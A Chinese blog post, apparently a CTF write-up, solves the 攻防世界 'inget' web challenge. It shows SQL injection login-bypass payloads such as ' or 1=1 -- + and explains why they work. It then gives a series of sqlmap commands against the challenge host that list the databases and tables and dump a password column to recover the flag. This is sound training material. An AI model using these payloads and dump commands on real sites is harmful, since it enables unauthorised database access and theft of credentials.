攻防世界-inget

最新推荐文章于 2024-04-30 22:07:29 发布
最新推荐文章于 2024-04-30 22:07:29 发布
阅读量352 收藏 4
点赞数 4
分类专栏: CTF-web 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39579781/article/details/137086841
版权

题目信息

在这里插入图片描述

相关知识

这是一个get请求,因此考虑直接在url中添加参数
在这里插入图片描述

解题过程

1、构建万能密码

a.万能密码1

/?id=' or ''=',此时我们传入到后端的查询条件应该是:
'id=' or ''=''
由于or的两边只要有一边成立,结果就为真,而 单引号=单引号 这个肯定是恒成立的,
在这里插入图片描述

b.万能密码2

?id=' or '1=1此时我们传入到后端的查询条件应该是:

'id=' or '1=1'
在这里插入图片描述

c.万能密码3

/?id=' or 1=1 -- +,原理与上文相同, --+ 起注释作用,将后面的语句注释掉(-- +或者-- -都可以)
此时输入的url复制下来为:
http://61.147.171.105:54665//?id=%27%20or%201=1%20--%20-
在这里插入图片描述
在这里插入图片描述

2、SQLMap

SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库;
它支持以下几种独特的注入:

  • 基于布尔类型的注入,即可根据返回页面判断条件真假的注入;
  • 基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
  • 基于报错的注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中,比如数据库报错的信息等;
  • 联合查询注入,即可以使用Union的情况下注入;
  • 堆叠查询注入,即可以同时执行多条语句时的注入;

a.常用命令

在这里插入图片描述

b.解题过程

测试能否通:
python sqlmap.py -u http://61.147.171.105:54665/?id=1/
在这里插入图片描述显示当前网站所有的数据库:
python sqlmap.py -u http://61.147.171.105:54665/?id=1 --dbs
在这里插入图片描述可以看到有一个名为cyber的数据库,我们指定列出它的表

列出指定数据库的表:
python sqlmap.py -u http://61.147.171.105:54665/?id=1 -D cyber --tables
在这里插入图片描述可以看到这个数据库里只有一个表,且和数据库同名

我们继续列出指定表的字段

python sqlmap.py -u http://61.147.171.105:54665/?id=1 -D cyber -T cyber --columns

在这里插入图片描述

获取指定字段中的数据

python sqlmap.py -u http://61.147.171.105:54665/?id=1 -D cyber -T cyber -C pw --dump,可获得相应的flag
在这里插入图片描述

郭子不想改bug
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
m box 2 mini 驱动
11-08
m box 2 mini 驱动
攻防世界-inget(简单的SQL注入、万能密码)
Welcome To Myon'Blog !
04-14 4146
inget(简单的SQL注入)、手工注入、万能密码原理、sqlmap实现、常用参数
攻防世界--inget
qq_73611185的博客
09-09 130
然后就 不会做了(web知识面非常浅薄,采用边做题边学知识的做法) ,开始在网上找wp,看了wp说这里使用sql注入的万能语句?我们知道SQL语句中where相当于判断语句,并且是由 or 连接的,所以 username=’’ 和 1=1 中有一个为真就为真。原文链接:https://blog.csdn.net/weixin_41607190/article/details/82818804。我们分析下语义,在SQL语法中 # 是注释符,所以后面的语句都会杯注释掉,那么上面的语句就等价于。
攻防世界-web-inget
wuh2333的博客
04-05 264
攻防世界,inget,sql注入
攻防世界WEB练习-inget
不知名白帽的博客
09-01 9949
攻防世界WEB练习-inget
全新桥隧坡安全监测解决方案,24h监测效率提升30%
Hi_Target的博客
04-30 849
4月26日,交通运输部党组书记、部长李小鹏在部务会上强调,要高度重视公路桥梁隧道结构监测工作,抓紧推进公路桥梁隧道结构监测系统建设,进一步健全完善公路桥梁隧道结构监测长效运行机制。基于北斗高精度定位技术,采用高精度传感器,融合物联网、人工智能以及三维数字化仿真等技术,实时获取运营数据,掌握桥隧坡的运行状况,可有效减少维护成本,保障运营安全。具备振弦、电压、电流、差阻、RS485、RS232、开关量、继电器、RJ45接口。在全国各省份设有26家分公司,具备专业、高效的演示、演练、支撑、交付等本地化服务能力。
Linux服务器安全基础 - 查看入侵痕迹
eagle89的专栏
04-30 1035
Linux服务器安全基础 - 查看入侵痕迹
等保测评常见安全风险
weixin_64392888的博客
04-28 696
9. **网络分段风险**:二级及以上系统应将重要网络区域和非重要网络区域划分在不同网段或子网,避免生产网络和办公网络混在一起带来的风险。1. **信息泄露风险**:评估系统中存储、传输和处理的敏感信息的安全性,防止数据被非法获取,避免个人隐私泄露或公司机密泄露等问题。13. **个人信息保护风险**:二级及以上系统在未授权的情况下不应采集、存储用户个人隐私信息,避免违规行为带来的风险。5. **不安全的通信风险**:评估传输数据时的加密和解密机制,确保数据在传输过程中的安全,防止数据被窃听或篡改。
安全运维 -- splunk 操作手册
最新发布
leeezp的博客
04-30 867
日常运维操作笔记 (持续更新)
Go语言的map并发读写如何保证安全
技术笔记
04-28 1025
为了保证Go语言中map的并发安全,我们可以使用互斥锁(如sync.Mutex或)来保护对map的访问,或者使用并发安全的map实现(如sync.Map选择哪种方式取决于具体的应用场景和需求。在大多数情况下,使用互斥锁是一个灵活且可靠的选择,而sync.Map则适用于特定的读多写少场景。推荐阅读Golang实战项目分享Golang专栏Go语言异常处理方式。
网络安全实训Day16
Yisitelz的博客
04-26 1242
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
小长假来临,企业借助巡检系统做好安全巡查工作
wsd56735676的博客
04-29 473
小长假期间,企业面临员工离岗、生产活动减少等特殊情况,安全隐患易被忽视。借助巡检系统做好全面安全巡查工作至关重要,包括制定巡检计划和路线、分配和管理巡检任务、识别和处理安全隐患、数据分析和优化、培训和沟通以及应急响应准备,确保企业安全生产。
Ftrans文件外发系统 构建安全可控文件外发流程
文件数据安全交换
04-29 587
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
Windows操作系统安全精讲视频课程
2301_79581760的博客
04-26 946
1.1IT运维职位需要学习的技能.mp4 1-2利用缓存的网络凭据入侵服务器.mp4 1-3信息安全包括哪些方面.mp4 1-4管理本地用户账户和组.mp4 1-5创建检查删除计算机上隐藏的账户.mp4 1-6用户账户控制(UAC)详解.mp4 1-7使用windowsPE新设置管理员密码.mp4 1-8使用LC5找回Windows账户密码.mp4
网络安全知识点
lv785的博客
04-26 1568
概念:IPSec 是“IP 安全”的缩写,是IETF在开发 IPv6时为保证IP数据报安全而设计的,是IPv6的一个组成 部分、是IPv4的可选项,其基本目的就是把安全机制引入 IP协议。欺骗:指利用主机之间的正常信任关系,通过修改IP数据包中的源地址,以绕开主机或网络访问控制、隐藏攻击来源的攻击技术。概念:入侵检测就是对入侵行为的 检测与发现,即在计算机网络系统中的若干关键点搜集信息,通过对所收集信息的分析发现网络系统中是否有违反安全策略的行为和遭到攻击的迹象。简要分析RSA算法的安全性得以保障的原因。
保序加密技术:保护数据有序性的安全方案
jiamisoft的博客
04-30 457
保序加密技术是一种特殊的加密方式,它允许对加密数据进行特定的有序操作,同时保持数据的加密状态。与传统的加密技术不同,OPE允许用户在不解密的情况下,对加密的数据进行范围搜索和比较,因为加密后的数据保持了原始数据的顺序特性。
Java安全之Mojarra JSF反序列化
Ly768768的博客
04-26 1180
JavaServer Faces,新一代的Java Web应用技术标准,吸收了很多Java Servlet以及其他的Web应用框架的特性。JSF为Web应用开发定义了一个事件驱动的、基于组件的模型。其中常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFacesJavaServerFaces(JSF)概念在几年前就已经引入,现在主要在J2EE中使用。
如何安全可控的进行跨区域数据交换,提高数据价值?
文件数据安全交换
04-30 697
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
网络安全入门 5 天速成教程: WEB 安全渗透攻防技术
baimaozi008的博客
04-30 1240
随着 Web 技术发展越来越成熟,而非 Web 服务越来越少的暴露在互联网上,现在互联网安全主要指的是 Web 安全。为了自身不“裸奔”在大数据里,渐渐开始学习 Web 安全,在学习 Web 安全的过程中,发现很大一部分知识点都相对零散,如果没有相对清晰 的脉络作为参考,会给学习带来一些不必要的负担。于是之后就把一些知识、想法整理记录下来,最后形成了这份《Web 安全学习笔记》。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值